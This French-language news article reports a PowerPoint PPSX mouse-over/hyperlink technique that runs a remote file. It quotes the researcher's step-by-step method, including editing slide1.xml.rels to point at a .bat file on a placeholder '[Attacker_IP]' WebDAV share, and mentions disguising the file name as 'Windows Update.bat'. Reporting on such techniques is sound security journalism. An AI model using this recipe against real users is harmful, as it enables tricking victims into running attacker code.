C'est dans les vieux pots qu'on fait les meilleures soupes. Voilà un adage qui correspond très bien aux attaques informatiques comme celles par survol de souris que l'on pensait disparues. On pensait en effet être débarrassée depuis 2017 de la technique permettant l'installation de malware dont Zusy en survolant un simple lien dans un fichier PowerPoint et que Microsoft avait corrigé. Las, trois ans plus tard une technique similaire a été révélée permettant à un pirate de trouver une porte d'entrée à un système distant.
Cette découverte a été faite par un certain « ethanhunnt » qui a posté dans un répertoire GitHub sa découverte. « Nous pouvons définir un fichier à exécuter et il a été exploité par des attaquants en 2017 où une commande Powershell particulière pouvait être exécutée », explique le lanceur d'alerte. « Comme cette vulnérabilité a été corrigée, celle-ci est une extension de celle-ci où au lieu d'utiliser l'action « Exécuter le programme », nous utilisons l'action « HyperLink To» et la définissons sur un « Autre fichier ». Ensuite, nous pouvons sélectionner un fichier dans le système. enregistrer le fichier Powerpoint au format PPSX ou PPS et ouvrir le fichier PPSX à l'aide d'un programme ZIP et modifiez la valeur dans « \ ppt \ slides_rels \ slide1.xml.rels » de rID qui est connecté à votre événement souris sur « file: /// [Attacker_IP] \ webdavfolder \ file .bat ». En raison de la façon dont les connexions SMB fonctionnent dans Windows 10, les connexions SMB sur Internet sont possibles même si les ports SMB (445/139) sont fermés si un serveur Web prenant en charge l'extension WEBDAV est hébergé par un attaquant », précise ethanhunnt.
Pas une vulnérabilité de PowerPoint selon Microsoft
Une différence de taille toutefois, puisque cette fois, le survol de souris dans un document PowerPoint nécessite a posteriori d'une action de l'utilisateur, en cliquant sur un pop-up. « L'attaque est capable de contourner la restriction de PowerPoint de ne pas pouvoir ajouter un fichier distant à l'action HyperLink, ce que si nous essayons d'ajouter en utilisant l'interface graphique, nous ne pouvons pas », a prévenu Mandar Satam, chercheur en sécurité indépendant interrogé par Threatpost. A noter que le nom du fichier peut être manipulé pour afficher n'importe quoi, y compris "Windows Update.bat" ou "Chargement.. Veuillez patienter.exe".
Pour Microsoft, le fait que l'utilisateur doive cliquer sur un pop-up ne constitue pas une vulnérabilité de PowerPoint. Il n'empêche que la technique utilisée représente un véritable risque en cas d'inattention de l'utilisateur. D'après Mandar Satam, la faiblesse se situe dans les fichiers Open XML Slide Show, PPSX, des types de fichiers PowerPoint seulement conçus pour la lecture de présentation qui ne peuvent pas être modifiés.